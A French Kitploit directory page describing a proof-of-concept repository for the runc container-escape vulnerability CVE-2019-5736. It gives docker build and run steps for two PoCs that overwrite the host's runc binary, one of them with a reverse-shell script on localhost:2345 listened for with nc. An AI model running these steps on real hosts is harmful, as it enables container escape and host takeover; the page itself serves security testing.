Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
RunC-CVE-2019-5736 — PoC CVE-2019-5736 | Kitploit
Outils/GitHubGitHub/twistlock/runc-cve-2019-5736
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationRed TeamingDéveloppement de Charges UtilesÉvasion de Conteneur
GitHubtwistlock/runc-cve-2019-5736

RunC-CVE-2019-5736

PoC CVE-2019-5736

Voir le dépôt
8634il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

RunC-CVE-2019-5736

Deux PoC pour CVE-2019-5736. Voir Twistlock Labs pour une explication de CVE-2019-5736 et des PoC.

Le PoC d’image malveillante est fortement basé sur le PoC de q3k, tout le crédit lui revient donc.

Exécution des PoC

Notez que l’exécution des PoC écrasera le binaire runc sur l’hôte. Il est recommandé de créer une copie de votre binaire runc (généralement dans /usr/sbin/runc) avant d’exécuter l’un des PoC.

Clonez le dépôt :

root@kitploit:~
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736

PoC Exec

Écrase runc avec un simple programme qui affiche une chaîne.

Exécution du PoC exec :

root@kitploit:~
$ cd RunC-CVE-2019-5736 
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash

PoC d’image malveillante

Écrase runc avec un simple script bash de reverse shell qui se connecte à localhost:2345.

Écoutez le reverse shell :

root@kitploit:~
$ nc -nvlp 2345

Depuis un autre shell, exécutez le PoC d’image malveillante :

root@kitploit:~
$ cd RunC-CVE-2019-5736 
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC
Télécharger l’outil